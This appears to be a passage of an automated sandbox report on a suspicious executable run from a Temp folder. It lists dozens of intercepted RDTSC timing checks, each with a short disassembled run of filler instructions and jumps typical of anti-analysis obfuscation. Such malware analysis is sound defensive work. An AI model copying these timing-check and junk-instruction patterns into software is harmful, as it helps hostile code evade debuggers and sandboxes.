Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 66584A second address: 665856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF698E1E1A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 669838 second address: 669845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FF698BF10C6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 669845 second address: 669852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF698E1E1A6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 669852 second address: 669867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jp 00007FF698BF10CAh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 66D7B0 second address: 66D7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1AAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF698E1E1AFh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 66D7D0 second address: 66D7F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF698BF10D1h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 66D7F0 second address: 66D809 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 66D809 second address: 66D822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 66CAFB second address: 66CB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FF698E1E1AAh 0x0000000b popad 0x0000000c jnc 00007FF698E1E1B2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 66CB1E second address: 66CB29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF698BF10C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 674909 second address: 67490D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 67490D second address: 67494C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e je 00007FF698BF10C6h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d pushad 0x0000001e jmp 00007FF698BF10D1h 0x00000023 jbe 00007FF698BF10C6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6754FD second address: 675503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 675DFB second address: 675E00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 675E00 second address: 675E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 675E0C second address: 675E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 67608A second address: 676097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF698E1E1A6h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 676674 second address: 67667A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 67667A second address: 676685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 679BEF second address: 679BF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 67A253 second address: 67A257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 67A257 second address: 67A25B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 67A3D1 second address: 67A3D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 67F290 second address: 67F2DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FF698BF10C6h 0x00000009 jmp 00007FF698BF10D3h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push esi 0x00000012 jmp 00007FF698BF10CEh 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop esi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jns 00007FF698BF10C6h 0x00000025 push edx 0x00000026 pop edx 0x00000027 jmp 00007FF698BF10D0h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 67F2DF second address: 67F2FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF698E1E1B6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 68087F second address: 680883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 680883 second address: 6808F5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF698E1E1A6h 0x00000008 jp 00007FF698E1E1A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jno 00007FF698E1E1B2h 0x00000016 pushad 0x00000017 pushad 0x00000018 jns 00007FF698E1E1A6h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007FF698E1E1B1h 0x00000025 jmp 00007FF698E1E1B0h 0x0000002a popad 0x0000002b pushad 0x0000002c push eax 0x0000002d pop eax 0x0000002e push esi 0x0000002f pop esi 0x00000030 jc 00007FF698E1E1A6h 0x00000036 jmp 00007FF698E1E1B0h 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e jng 00007FF698E1E1A6h 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 68923E second address: 689242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 687886 second address: 68788B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 687E4E second address: 687E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FF698BF10C6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 687E5A second address: 687E6E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF698E1E1A6h 0x00000008 jl 00007FF698E1E1A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 687E6E second address: 687E7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FF698BF10C6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 687E7E second address: 687E89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 687E89 second address: 687E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 688129 second address: 688149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FF698E1E1A6h 0x00000010 jmp 00007FF698E1E1B0h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 686FD0 second address: 686FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 68E7F7 second address: 68E7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 68E7FB second address: 68E806 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 690B5A second address: 690B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 690B5E second address: 690B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 690B62 second address: 690B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 690B6E second address: 690B76 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 692299 second address: 6922BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jng 00007FF698E1E1C1h 0x0000000d jmp 00007FF698E1E1B5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5CF118 second address: 5CF132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF698BF10C6h 0x0000000a pop ecx 0x0000000b jmp 00007FF698BF10CFh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5CF132 second address: 5CF138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5CF138 second address: 5CF13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5CF13C second address: 5CF150 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FF698E1E1A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5CF150 second address: 5CF154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5CF154 second address: 5CF158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 695026 second address: 69503F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 ja 00007FF698BF10CEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 69503F second address: 695045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 695045 second address: 695049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 695049 second address: 695065 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 695065 second address: 695070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 695070 second address: 695076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 695076 second address: 69507C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 695362 second address: 695383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FF698E1E1B7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6A1941 second address: 6A1956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push edi 0x00000008 jc 00007FF698BF10C6h 0x0000000e pop edi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6A1956 second address: 6A195D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6A195D second address: 6A1971 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF698BF10CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6A1971 second address: 6A1975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6A8825 second address: 6A8829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6A8829 second address: 6A8838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FF698E1E1A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6AD7A6 second address: 6AD7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6AD7AB second address: 6AD7C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF698E1E1B4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6B45B9 second address: 6B45C3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF698BF10C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6B45C3 second address: 6B45D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a js 00007FF698E1E1A8h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6B45D8 second address: 6B45DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6B8A60 second address: 6B8A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007FF698E1E1B0h 0x0000000d jmp 00007FF698E1E1B0h 0x00000012 popad 0x00000013 push esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6B8A8E second address: 6B8A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6BC910 second address: 6BC921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007FF698E1E1ACh 0x0000000b jns 00007FF698E1E1A6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6BC7AA second address: 6BC7AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6BC7AE second address: 6BC7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF698E1E1B3h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6BC7C9 second address: 6BC7CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6C13E1 second address: 6C13EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 je 00007FF698E1E1A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6C1880 second address: 6C188E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FF698BF10C6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6C1A02 second address: 6C1A0C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6C1A0C second address: 6C1A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6C1BBC second address: 6C1BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007FF698E1E1ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6C2621 second address: 6C262E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF698BF10C6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6C4BF2 second address: 6C4C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FF698E1E1B2h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 5D266A second address: 5D266F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6C6BDE second address: 6C6BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6D6F3B second address: 6D6F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6DA49E second address: 6DA4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6DA381 second address: 6DA385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6D5A7E second address: 6D5A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6FF482 second address: 6FF491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF698BF10C6h 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6FF491 second address: 6FF4C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FF698E1E1A6h 0x00000009 pop eax 0x0000000a jnp 00007FF698E1E1BEh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
